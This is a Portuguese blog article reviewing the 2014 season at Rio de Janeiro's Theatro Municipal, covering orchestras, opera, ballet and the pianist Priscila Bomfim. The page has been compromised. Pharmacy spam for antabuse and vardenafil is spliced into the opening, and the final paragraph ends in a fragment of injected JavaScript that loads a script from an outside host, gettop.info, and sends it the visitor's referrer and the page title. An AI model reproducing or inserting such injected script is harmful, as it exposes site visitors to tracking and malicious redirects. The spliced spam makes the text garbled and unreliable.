Escrito por em 1 jan 2015 nas áreas Artigo, Lateral

Purchase antabuse cost us Buy Pills online vardenafil hcl 20mg tab Purchase Ponto altíssimo como destaque no TMRJ é a presença da pianista PRISCILA BOMFIM.

Atacando o assunto sem rodeios, diremos que entre os destaques de 2014 no TMRJ  salienta-se de cara a FILARMÔNICA DE DRESDEN, que nos presenteou com  uma notável primeira sinfonia de Brahms.

Outro destaque foi a PHILARMONIA ORCHESTER, tradicional orquestra inglesa,  que nos enlevou com um magnífico IMPERADOR, com NÉLSON FREIRE ao piano. Uma edição de manual.

Salientou-se também em 2014 uma SALOME , de RICHARD STRAUSS, magistralmente regida por SÍLVIO VIEGAS e muito bem cantada por CRISTINA BAGGIO.

Outro ponto alto da programação de 2014 foi o soprano japonês HIROMI OMURA, que cantou muito bem o papel de MADAMA BUTTERFLY, de PUCCINI.

Os ballets apresentados com o CORPO DE BAILE DO TMRJ e seus solistas principais foram todos excelentes marcos de arte tanto na parte técnica quanto na parte interpretativa. As primeiras bailarinas MÁRCIA JACQUELINE, CLÁUDIA MOTTA e RENATA TUBARÃO encantaram um público sempre numeroso e sempre entusiasmado com Swanilda´s de sonho.

Os ballets LA BAYADÉRE  e  O QUEBRA-NOZES, todos de casa lotada em numerosíssimas récitas ( o LA BAYADÉRE mereceu 14 apresentações, coisa não feita por nenhum outro título da programação) foram muito bem dançados e interpretados, sob a direção de SÉRGIO LOBATO.

Atração super entusiasmante da programação foi a apresentação das estrelas e do corpo de baile do KIROV, ballet do Teatro Mariinsky de São Petersburgo. Atração rara, digna dos grandes teatros do mundo.

Na dança, se destacam longe o nosso GRUPO CORPO, uma das melhores companhias de dança (não confundir com “ballet”) do mundo, e o grupo MOMIX, de dança acrobática e humorística.

Ponto altíssimo como destaque no TMRJ é a presença da pianista PRISCILA BOMFIM. Essa insigne artista é solista, instrumentista nas orquestras, ensaiadora, preparadora, recitalista, acompanhadora, e tudo mais de que  faça parte um piano no TMRJ. Elemento utilíssimo, desfila pelo TMRJ com seu porte de rainha e suas mãos de princesa Habsburgo…s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário